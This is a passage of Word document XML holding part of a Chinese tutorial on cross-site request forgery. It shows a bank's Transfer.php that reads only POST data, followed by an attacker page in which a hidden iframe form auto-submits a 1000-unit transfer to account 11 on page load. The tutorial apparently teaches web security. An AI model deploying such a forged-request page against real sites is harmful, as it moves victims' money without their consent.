          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>数据的问题。</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>示例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>：</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经过前面</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>个惨痛的教训，银行决定把获取请求数据的方法也改了，改用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>$_POST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，只获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>请求的数据，后台处理页面</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Transfer.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94D59" w:rsidRDefault="00A94D59" w:rsidP="00A94D59">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="3D81EE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="189865" cy="189865"/>
            <wp:effectExtent l="19050" t="0" r="635" b="0"/>
            <wp:docPr id="199" name="图片 6" descr="复制代码">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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复制代码">
                      <a:hlinkClick r:id="rId10" tooltip="&quot;复制代码&quot;"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="189865" cy="189865"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94D59" w:rsidRDefault="00A94D59" w:rsidP="00A94D59">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>&lt;?php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="008080"/>
        </w:rPr>
        <w:t>session_start</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>isset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800080"/>
        </w:rPr>
        <w:t>$_POST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>['toBankId'] &amp;&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>isset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800080"/>
        </w:rPr>
        <w:t>$_POST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>['money']))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>    buy_stocks(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800080"/>
        </w:rPr>
        <w:t>$_POST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>['toBankId'],</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800080"/>
        </w:rPr>
        <w:t>$_POST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>['money']);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94D59" w:rsidRDefault="00A94D59" w:rsidP="00A94D59">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="3D81EE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="189865" cy="189865"/>
            <wp:effectExtent l="19050" t="0" r="635" b="0"/>
            <wp:docPr id="198" name="图片 7" descr="复制代码">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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复制代码">
                      <a:hlinkClick r:id="rId10" tooltip="&quot;复制代码&quot;"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="189865" cy="189865"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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然而，危险网站</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>与时俱进，它改了一下代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94D59" w:rsidRDefault="00A94D59" w:rsidP="00A94D59">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="3D81EE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="189865" cy="189865"/>
            <wp:effectExtent l="19050" t="0" r="635" b="0"/>
            <wp:docPr id="197" name="图片 8" descr="复制代码">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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复制代码">
                      <a:hlinkClick r:id="rId10" tooltip="&quot;复制代码&quot;"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="189865" cy="189865"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94D59" w:rsidRDefault="00A94D59" w:rsidP="00A94D59">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>head</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>script </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>="text/javascript"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t> steal()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:br/>
        <w:t>          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t xml:space="preserve"> iframe = document.frames["steal"];</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>      iframe.document.Submit("transfer");</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>head</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>body </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>onload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>="steal()"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>iframe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>="steal"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t> display</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>="none"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>form </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>method</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>="POST"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t> name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>="transfer"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>action</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>="http://www.myBank.com/Transfer.php"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>input </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>="hidden"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t> name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>="toBankId"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t> value</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>="11"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>input </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>="hidden"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t> name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>="money"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t> value</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>="1000"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>form</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>body</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94D59" w:rsidRDefault="00A94D59" w:rsidP="00A94D59">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
